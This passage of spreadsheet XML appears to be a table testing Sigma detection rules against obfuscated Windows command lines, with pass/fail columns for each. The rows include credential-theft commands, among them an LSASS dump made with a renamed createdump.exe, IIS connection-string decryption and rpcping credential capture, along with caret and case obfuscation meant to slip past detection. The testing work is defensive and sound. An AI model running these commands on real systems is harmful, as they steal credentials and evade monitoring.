        <v>0</v>
      </c>
    </row>
    <row r="144" ht="15.75" customHeight="1" s="42">
      <c r="A144" s="43" t="n"/>
      <c r="B144" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_connection_strings_decryption</t>
        </is>
      </c>
      <c r="C144" s="44" t="inlineStr">
        <is>
          <t>Microsoft IIS Connection Strings Decryption</t>
        </is>
      </c>
      <c r="D144" s="44" t="inlineStr">
        <is>
          <t>97dbf6e2-e436-44d8-abee-4261b24d3e41</t>
        </is>
      </c>
      <c r="E144" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe,Control_RunDLL -PdF connectionStrings C:\inetpub\wwwroot</t>
        </is>
      </c>
      <c r="F144" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G144" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H144" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I144" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J144" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K144" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="145" ht="15.75" customHeight="1" s="42">
      <c r="A145" s="43" t="n"/>
      <c r="B145" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_connection_strings_decryption</t>
        </is>
      </c>
      <c r="C145" s="44" t="inlineStr">
        <is>
          <t>Microsoft IIS Connection Strings Decryption</t>
        </is>
      </c>
      <c r="D145" s="44" t="inlineStr">
        <is>
          <t>97dbf6e2-e436-44d8-abee-4261b24d3e41</t>
        </is>
      </c>
      <c r="E145" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe,Control_RunDLL -"pdf" connectionStrings C:\inetpub\wwwroot</t>
        </is>
      </c>
      <c r="F145" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G145" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H145" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I145" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J145" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K145" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="146" ht="15.75" customHeight="1" s="42">
      <c r="A146" s="43" t="n"/>
      <c r="B146" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_connection_strings_decryption</t>
        </is>
      </c>
      <c r="C146" s="44" t="inlineStr">
        <is>
          <t>Microsoft IIS Connection Strings Decryption</t>
        </is>
      </c>
      <c r="D146" s="44" t="inlineStr">
        <is>
          <t>97dbf6e2-e436-44d8-abee-4261b24d3e41</t>
        </is>
      </c>
      <c r="E146" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe,Control_RunDLL /"pdf" connectionStrings C:\inetpub\wwwroot</t>
        </is>
      </c>
      <c r="F146" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G146" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H146" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I146" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J146" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K146" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="147" ht="15.75" customHeight="1" s="42">
      <c r="A147" s="43" t="n"/>
      <c r="B147" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_connection_strings_decryption</t>
        </is>
      </c>
      <c r="C147" s="44" t="inlineStr">
        <is>
          <t>Microsoft IIS Connection Strings Decryption</t>
        </is>
      </c>
      <c r="D147" s="44" t="inlineStr">
        <is>
          <t>97dbf6e2-e436-44d8-abee-4261b24d3e41</t>
        </is>
      </c>
      <c r="E147" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe,Control_RunDLL -pdF connectionStrings C:\inetpub\wwwroot</t>
        </is>
      </c>
      <c r="F147" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G147" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H147" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I147" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J147" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K147" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="148" ht="15.75" customHeight="1" s="42">
      <c r="A148" s="43" t="n"/>
      <c r="B148" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_open_command</t>
        </is>
      </c>
      <c r="C148" s="44" t="inlineStr">
        <is>
          <t>Suspicious Reg Add Open Command</t>
        </is>
      </c>
      <c r="D148" s="44" t="inlineStr">
        <is>
          <t>dd3ee8cc-f751-41c9-ba53-5a32ed47e563</t>
        </is>
      </c>
      <c r="E148" s="44" t="inlineStr">
        <is>
          <t>reg add HKCU\Software\Classes\ms-settings\shell\opencommand /value=test /validdataentropy=512 /expandtostring</t>
        </is>
      </c>
      <c r="F148" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G148" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H148" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I148" s="43" t="n"/>
      <c r="J148" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K148" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="149" ht="15.75" customHeight="1" s="42">
      <c r="A149" s="43" t="n"/>
      <c r="B149" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rpcping_credential_capture</t>
        </is>
      </c>
      <c r="C149" s="44" t="inlineStr">
        <is>
          <t>Capture Credentials with Rpcping.exe</t>
        </is>
      </c>
      <c r="D149" s="44" t="inlineStr">
        <is>
          <t>93671f99-04eb-4ab4-a161-70d446a84003</t>
        </is>
      </c>
      <c r="E149" s="44" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\rpcping.exe -s 10.0.0.5</t>
        </is>
      </c>
      <c r="F149" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G149" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H149" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I149" s="43" t="n"/>
      <c r="J149" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K149" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="150" ht="15.75" customHeight="1" s="42">
      <c r="A150" s="43" t="n"/>
      <c r="B150" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_query_interesting_services</t>
        </is>
      </c>
      <c r="C150" s="44" t="inlineStr">
        <is>
          <t>Interesting Service Enumeration Via Sc.EXE</t>
        </is>
      </c>
      <c r="D150" s="44" t="inlineStr">
        <is>
          <t>e83e8899-c9b2-483b-b355-5decc942b959</t>
        </is>
      </c>
      <c r="E150" s="44" t="inlineStr">
        <is>
          <t>sc.exe qc termservice</t>
        </is>
      </c>
      <c r="F150" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G150" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H150" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I150" s="43" t="n"/>
      <c r="J150" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K150" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="151" ht="15.75" customHeight="1" s="42">
      <c r="A151" s="43" t="n"/>
      <c r="B151" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_query_interesting_services</t>
        </is>
      </c>
      <c r="C151" s="44" t="inlineStr">
        <is>
          <t>Interesting Service Enumeration Via Sc.EXE</t>
        </is>
      </c>
      <c r="D151" s="44" t="inlineStr">
        <is>
          <t>e83e8899-c9b2-483b-b355-5decc942b959</t>
        </is>
      </c>
      <c r="E151" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" sc.exe q^uery te^rmservice</t>
        </is>
      </c>
      <c r="F151" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G151" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H151" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I151" s="43" t="n"/>
      <c r="J151" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K151" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="152" ht="15.75" customHeight="1" s="42">
      <c r="A152" s="43" t="n"/>
      <c r="B152" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_query_interesting_services</t>
        </is>
      </c>
      <c r="C152" s="44" t="inlineStr">
        <is>
          <t>Interesting Service Enumeration Via Sc.EXE</t>
        </is>
      </c>
      <c r="D152" s="44" t="inlineStr">
        <is>
          <t>e83e8899-c9b2-483b-b355-5decc942b959</t>
        </is>
      </c>
      <c r="E152" s="44" t="inlineStr">
        <is>
          <t>powershell.exe Get-Service -Name termservice</t>
        </is>
      </c>
      <c r="F152" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G152" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H152" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I152" s="43" t="n"/>
      <c r="J152" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K152" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="153" ht="15.75" customHeight="1" s="42">
      <c r="A153" s="43" t="n"/>
      <c r="B153" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_query_interesting_services</t>
        </is>
      </c>
      <c r="C153" s="44" t="inlineStr">
        <is>
          <t>Interesting Service Enumeration Via Sc.EXE</t>
        </is>
      </c>
      <c r="D153" s="44" t="inlineStr">
        <is>
          <t>e83e8899-c9b2-483b-b355-5decc942b959</t>
        </is>
      </c>
      <c r="E153" s="44" t="inlineStr">
        <is>
          <t>powershell.exe Get-Service -nAmE termservice</t>
        </is>
      </c>
      <c r="F153" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G153" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H153" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I153" s="43" t="n"/>
      <c r="J153" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K153" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="154" ht="15.75" customHeight="1" s="42">
      <c r="A154" s="43" t="n"/>
      <c r="B154" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_query_interesting_services</t>
        </is>
      </c>
      <c r="C154" s="44" t="inlineStr">
        <is>
          <t>Interesting Service Enumeration Via Sc.EXE</t>
        </is>
      </c>
      <c r="D154" s="44" t="inlineStr">
        <is>
          <t>e83e8899-c9b2-483b-b355-5decc942b959</t>
        </is>
      </c>
      <c r="E154" s="44" t="inlineStr">
        <is>
          <t>powershell.exe Get-Service /"Name" termservice</t>
        </is>
      </c>
      <c r="F154" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G154" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H154" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I154" s="43" t="n"/>
      <c r="J154" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K154" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="155" ht="15.75" customHeight="1" s="42">
      <c r="A155" s="43" t="n"/>
      <c r="B155" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_query_interesting_services</t>
        </is>
      </c>
      <c r="C155" s="44" t="inlineStr">
        <is>
          <t>Interesting Service Enumeration Via Sc.EXE</t>
        </is>
      </c>
      <c r="D155" s="44" t="inlineStr">
        <is>
          <t>e83e8899-c9b2-483b-b355-5decc942b959</t>
        </is>
      </c>
      <c r="E155" s="44" t="inlineStr">
        <is>
          <t>powershell.exe Get-Service -nAMe termservice</t>
        </is>
      </c>
      <c r="F155" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G155" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H155" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I155" s="43" t="n"/>
      <c r="J155" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K155" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="156" ht="15.75" customHeight="1" s="42">
      <c r="A156" s="43" t="n"/>
      <c r="B156" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_query_interesting_services</t>
        </is>
      </c>
      <c r="C156" s="44" t="inlineStr">
        <is>
          <t>Interesting Service Enumeration Via Sc.EXE</t>
        </is>
      </c>
      <c r="D156" s="44" t="inlineStr">
        <is>
          <t>e83e8899-c9b2-483b-b355-5decc942b959</t>
        </is>
      </c>
      <c r="E156" s="44" t="inlineStr">
        <is>
          <t>powershell.exe Get-Service -NaME termservice</t>
        </is>
      </c>
      <c r="F156" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G156" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H156" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I156" s="43" t="n"/>
      <c r="J156" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K156" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="157" ht="15.75" customHeight="1" s="42">
      <c r="A157" s="43" t="n"/>
      <c r="B157" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_query_interesting_services</t>
        </is>
      </c>
      <c r="C157" s="44" t="inlineStr">
        <is>
          <t>Interesting Service Enumeration Via Sc.EXE</t>
        </is>
      </c>
      <c r="D157" s="44" t="inlineStr">
        <is>
          <t>e83e8899-c9b2-483b-b355-5decc942b959</t>
        </is>
      </c>
      <c r="E157" s="44" t="inlineStr">
        <is>
          <t>powershell.exe Get-Service -naMe termservice</t>
        </is>
      </c>
      <c r="F157" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G157" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H157" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I157" s="43" t="n"/>
      <c r="J157" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K157" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="158" ht="15.75" customHeight="1" s="42">
      <c r="A158" s="43" t="n"/>
      <c r="B158" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_shadow_copies_creation</t>
        </is>
      </c>
      <c r="C158" s="44" t="inlineStr">
        <is>
          <t>Shadow Copies Creation Using Operating Systems Utilities</t>
        </is>
      </c>
      <c r="D158" s="44" t="inlineStr">
        <is>
          <t>b17ea6f7-6e90-447e-a799-e6c0a493d6ce</t>
        </is>
      </c>
      <c r="E158" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" wmic shadowcopy cr^eate Volume=C:\</t>
        </is>
      </c>
      <c r="F158" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G158" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H158" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I158" s="43" t="n"/>
      <c r="J158" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K158" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="159" ht="15.75" customHeight="1" s="42">
      <c r="A159" s="43" t="n"/>
      <c r="B159" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_shadow_copies_creation</t>
        </is>
      </c>
      <c r="C159" s="44" t="inlineStr">
        <is>
          <t>Shadow Copies Creation Using Operating Systems Utilities</t>
        </is>
      </c>
      <c r="D159" s="44" t="inlineStr">
        <is>
          <t>b17ea6f7-6e90-447e-a799-e6c0a493d6ce</t>
        </is>
      </c>
      <c r="E159" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WmiMethod -Class ('Win32_Shad' + 'owCopy') -Name ('Cre' + 'ate') -ArgumentList 'C:\'"</t>
        </is>
      </c>
      <c r="F159" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G159" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H159" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I159" s="43" t="n"/>
      <c r="J159" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K159" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="160" ht="15.75" customHeight="1" s="42">
      <c r="A160" s="43" t="n"/>
      <c r="B160" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_shadow_copies_creation</t>
        </is>
      </c>
      <c r="C160" s="44" t="inlineStr">
        <is>
          <t>Shadow Copies Creation Using Operating Systems Utilities</t>
        </is>
      </c>
      <c r="D160" s="44" t="inlineStr">
        <is>
          <t>b17ea6f7-6e90-447e-a799-e6c0a493d6ce</t>
        </is>
      </c>
      <c r="E160" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMaND "Invoke-WmiMethod -Class ('Win32_Shad' + 'owCopy') -Name ('Cre' + 'ate') -ArgumentList 'C:\'"</t>
        </is>
      </c>
      <c r="F160" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G160" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H160" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I160" s="43" t="n"/>
      <c r="J160" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K160" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="161" ht="15.75" customHeight="1" s="42">
      <c r="A161" s="43" t="n"/>
      <c r="B161" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_shadow_copies_creation</t>
        </is>
      </c>
      <c r="C161" s="44" t="inlineStr">
        <is>
          <t>Shadow Copies Creation Using Operating Systems Utilities</t>
        </is>
      </c>
      <c r="D161" s="44" t="inlineStr">
        <is>
          <t>b17ea6f7-6e90-447e-a799-e6c0a493d6ce</t>
        </is>
      </c>
      <c r="E161" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WmiMethod -Class ('Win32_Shad' + 'owCopy') -Name ('Cre' + 'ate') -ArgumentList 'C:\'"</t>
        </is>
      </c>
      <c r="F161" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G161" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H161" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I161" s="43" t="n"/>
      <c r="J161" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K161" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="162" ht="15.75" customHeight="1" s="42">
      <c r="A162" s="43" t="n"/>
      <c r="B162" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_shadow_copies_creation</t>
        </is>
      </c>
      <c r="C162" s="44" t="inlineStr">
        <is>
          <t>Shadow Copies Creation Using Operating Systems Utilities</t>
        </is>
      </c>
      <c r="D162" s="44" t="inlineStr">
        <is>
          <t>b17ea6f7-6e90-447e-a799-e6c0a493d6ce</t>
        </is>
      </c>
      <c r="E162" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmANd "Invoke-WmiMethod -Class ('Win32_Shad' + 'owCopy') -Name ('Cre' + 'ate') -ArgumentList 'C:\'"</t>
        </is>
      </c>
      <c r="F162" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G162" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H162" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I162" s="44" t="n"/>
      <c r="J162" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K162" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="163" ht="15.75" customHeight="1" s="42">
      <c r="A163" s="43" t="n"/>
      <c r="B163" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_tasklist_module_enumeration</t>
        </is>
      </c>
      <c r="C163" s="44" t="inlineStr">
        <is>
          <t>Loaded Module Enumeration Via Tasklist.EXE</t>
        </is>
      </c>
      <c r="D163" s="44" t="inlineStr">
        <is>
          <t>34275eb8-fa19-436b-b959-3d9ecd53fa1f</t>
        </is>
      </c>
      <c r="E163" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" tasklist.exe /m rdpco^rets.dll</t>
        </is>
      </c>
      <c r="F163" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G163" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H163" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I163" s="43" t="n"/>
      <c r="J163" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K163" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="164" ht="15.75" customHeight="1" s="42">
      <c r="A164" s="43" t="n"/>
      <c r="B164" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_tasklist_module_enumeration</t>
        </is>
      </c>
      <c r="C164" s="44" t="inlineStr">
        <is>
          <t>Loaded Module Enumeration Via Tasklist.EXE</t>
        </is>
      </c>
      <c r="D164" s="44" t="inlineStr">
        <is>
          <t>34275eb8-fa19-436b-b959-3d9ecd53fa1f</t>
        </is>
      </c>
      <c r="E164" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" tasklist.exe /m rdpco^rets.dll</t>
        </is>
      </c>
      <c r="F164" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G164" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H164" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I164" s="43" t="n"/>
      <c r="J164" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K164" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="165" ht="15.75" customHeight="1" s="42">
      <c r="A165" s="43" t="n"/>
      <c r="B165" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_tasklist_module_enumeration</t>
        </is>
      </c>
      <c r="C165" s="44" t="inlineStr">
        <is>
          <t>Loaded Module Enumeration Via Tasklist.EXE</t>
        </is>
      </c>
      <c r="D165" s="44" t="inlineStr">
        <is>
          <t>34275eb8-fa19-436b-b959-3d9ecd53fa1f</t>
        </is>
      </c>
      <c r="E165" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c tasklist.exe -"m" rdpco^rets.dll</t>
        </is>
      </c>
      <c r="F165" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G165" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H165" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I165" s="43" t="n"/>
      <c r="J165" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K165" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="166" ht="15.75" customHeight="1" s="42">
      <c r="A166" s="43" t="n"/>
      <c r="B166" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_tasklist_module_enumeration</t>
        </is>
      </c>
      <c r="C166" s="44" t="inlineStr">
        <is>
          <t>Loaded Module Enumeration Via Tasklist.EXE</t>
        </is>
      </c>
      <c r="D166" s="44" t="inlineStr">
        <is>
          <t>34275eb8-fa19-436b-b959-3d9ecd53fa1f</t>
        </is>
      </c>
      <c r="E166" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-Process | Where-Object { $_.Modules.ModuleName -contains 'rdpcorets.dll' }"</t>
        </is>
      </c>
      <c r="F166" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G166" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H166" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I166" s="43" t="n"/>
      <c r="J166" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K166" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="167" ht="15.75" customHeight="1" s="42">
      <c r="A167" s="43" t="n"/>
      <c r="B167" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_tasklist_module_enumeration</t>
        </is>
      </c>
      <c r="C167" s="44" t="inlineStr">
        <is>
          <t>Loaded Module Enumeration Via Tasklist.EXE</t>
        </is>
      </c>
      <c r="D167" s="44" t="inlineStr">
        <is>
          <t>34275eb8-fa19-436b-b959-3d9ecd53fa1f</t>
        </is>
      </c>
      <c r="E167" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-Process | Where-Object { $_.Modules.ModuleName -contains 'rdpcorets.dll' }"</t>
        </is>
      </c>
      <c r="F167" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G167" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H167" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I167" s="43" t="n"/>
      <c r="J167" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K167" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="168" ht="15.75" customHeight="1" s="42">
      <c r="A168" s="43" t="n"/>
      <c r="B168" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_tasklist_module_enumeration</t>
        </is>
      </c>
      <c r="C168" s="44" t="inlineStr">
        <is>
          <t>Loaded Module Enumeration Via Tasklist.EXE</t>
        </is>
      </c>
      <c r="D168" s="44" t="inlineStr">
        <is>
          <t>34275eb8-fa19-436b-b959-3d9ecd53fa1f</t>
        </is>
      </c>
      <c r="E168" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnd "Get-Process | Where-Object { $_.Modules.ModuleName -contains 'rdpcorets.dll' }"</t>
        </is>
      </c>
      <c r="F168" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G168" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H168" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I168" s="43" t="n"/>
      <c r="J168" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K168" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="169" ht="15.75" customHeight="1" s="42">
      <c r="A169" s="43" t="n"/>
      <c r="B169" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_tasklist_module_enumeration</t>
        </is>
      </c>
      <c r="C169" s="44" t="inlineStr">
        <is>
          <t>Loaded Module Enumeration Via Tasklist.EXE</t>
        </is>
      </c>
      <c r="D169" s="44" t="inlineStr">
        <is>
          <t>34275eb8-fa19-436b-b959-3d9ecd53fa1f</t>
        </is>
      </c>
      <c r="E169" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaNd "Get-Process | Where-Object { $_.Modules.ModuleName -contains 'rdpcorets.dll' }"</t>
        </is>
      </c>
      <c r="F169" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G169" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H169" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I169" s="43" t="n"/>
      <c r="J169" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K169" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="170" ht="15.75" customHeight="1" s="42">
      <c r="A170" s="43" t="n"/>
      <c r="B170" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_tasklist_module_enumeration</t>
        </is>
      </c>
      <c r="C170" s="43" t="inlineStr">
        <is>
          <t>Loaded Module Enumeration Via Tasklist.EXE</t>
        </is>
      </c>
      <c r="D170" s="43" t="inlineStr">
        <is>
          <t>34275eb8-fa19-436b-b959-3d9ecd53fa1f</t>
        </is>
      </c>
      <c r="E170" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -CoMManD "Get-Process | Where-Object { $_.Modules.ModuleName -contains 'rdpcorets.dll' }"</t>
        </is>
      </c>
      <c r="F170" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G170" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H170" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I170" s="43" t="n"/>
      <c r="J170" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K170" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="171" ht="15.75" customHeight="1" s="42">
      <c r="A171" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B171" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C171" s="44" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D171" s="44" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E171" s="44" t="inlineStr">
        <is>
          <t>copy "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.17\createdump.exe" "C:\Windows\Temp\srv_task.exe" &amp;&amp; "C:\Windows\Temp\srv_task.exe" "-u" "-f" C:\Users\Public\dotnet-lsass.dump 788</t>
        </is>
      </c>
      <c r="F171" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G171" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H171" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I171" s="43" t="n"/>
      <c r="J171" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K171" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="172" ht="15.75" customHeight="1" s="42">
      <c r="A172" s="43" t="n"/>
      <c r="B172" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dump64_defender_av_bypass_rename</t>
        </is>
      </c>
      <c r="C172" s="44" t="inlineStr">
        <is>
          <t>Potential Windows Defender AV Bypass Via Dump64.EXE Rename</t>
        </is>
      </c>
      <c r="D172" s="44" t="inlineStr">
        <is>
          <t>129966c9-de17-4334-a123-8b58172e664d</t>
        </is>
      </c>
      <c r="E172" s="44" t="inlineStr">
        <is>
